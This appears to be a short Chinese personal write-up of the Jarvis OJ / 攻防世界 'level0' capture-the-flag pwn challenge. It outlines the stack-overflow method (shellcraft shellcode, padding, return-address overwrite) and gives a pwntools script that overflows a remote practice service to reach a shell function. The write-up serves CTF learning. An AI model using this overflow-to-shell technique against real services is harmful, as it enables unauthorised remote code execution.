攻防世界和jarvis oj level0个人做题小结
注意:攻防世界和这道题一模一样!!!!!!!
刚开始接触还不太熟悉详情请点下面链接
https://nocbtm.github.io/2018/09/21/oj-level0%E5%92%8Clevel1%E6%80%BB%E7%BB%93/
- 明白做栈溢出的套路
(1)找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接
(2)构建shellcode,用一句话就行shellcode = asm(shellcraft.sh())
(3)构建payload,payload的基本构建:payload=shellcode+’a’*一个长度+p32(buf_addr),次序一定不能乱
(4)最后就可以发送payload,进行交互,得到shell的控制权,然后ls ,cat flag - 做题过程
(1)首先放进ubuntu中查看他的权限和1位数
(2)然后用IDA打开 使用反编译 找到溢出点
vulnerable_function容易被攻击的函数这个地方就是他的溢出点
然后在找到system的地址
(3)下面是脚本在这里插入代码片
from pwn import *
s_addr=0x0000000000400596
p=remote("pwn2.jarvisoj.com",9881)#用来建立一个远程连接,url或者ip作为地址
然后指明端口,这里也可以仅仅使用本地文件,调试时方便
p.recvline()
p.sendline("A"*0x80+'A'*8+p64(s_addr))
p.interactive()
(4)最后是运行脚本